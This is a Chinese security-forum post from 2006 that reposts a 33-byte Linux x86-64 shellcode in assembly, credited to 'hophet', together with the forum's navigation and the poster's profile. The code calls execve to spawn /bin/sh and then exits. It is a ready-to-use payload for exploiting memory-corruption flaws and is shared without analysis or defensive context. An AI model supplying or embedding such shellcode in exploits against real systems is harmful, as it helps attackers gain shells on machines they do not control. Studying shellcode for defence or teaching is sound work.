‹‹ 上一主题 | 下一主题 ››
发新话题
打印

linux/x86-64 execve(/bin/sh) 33 bytes

ring04h

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 社区主管

帖子
3910 
精华
128 
积分
209604 
阅读权限
200 
性别
男 
在线时间
1058 小时 
注册时间
2007-10-23 
最后登录
2008-5-13 

资料收集奖 运营支持奖

楼主 发表于 2006-11-4 15:07  只看该作者

linux/x86-64 execve(/bin/sh) 33 bytes

复制内容到剪贴板
代码:
# [Linux/X86-64]
# Dummy for shellcode:
# execve("/bin/sh", ["/bin/sh"], NULL)
# hophet [at] gmail.com

.text
  .globl _start
_start:
  
  xorq  %rdx, %rdx
  movq  $0x68732f6e69622fff,%rbx
  shr  $0x8, %rbx
  push  %rbx
  movq  %rsp,%rdi
  xorq  %rax,%rax
  pushq  %rax
  pushq  %rdi
  movq  %rsp,%rsi
  mov  $0x3b,%al  # execve(3b)
  syscall

  pushq  $0x1
  pop  %rdi
  pushq  $0x3c    # exit(3c)
  pop  %rax
  syscall
...退出这个无聊的娱乐圈!

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题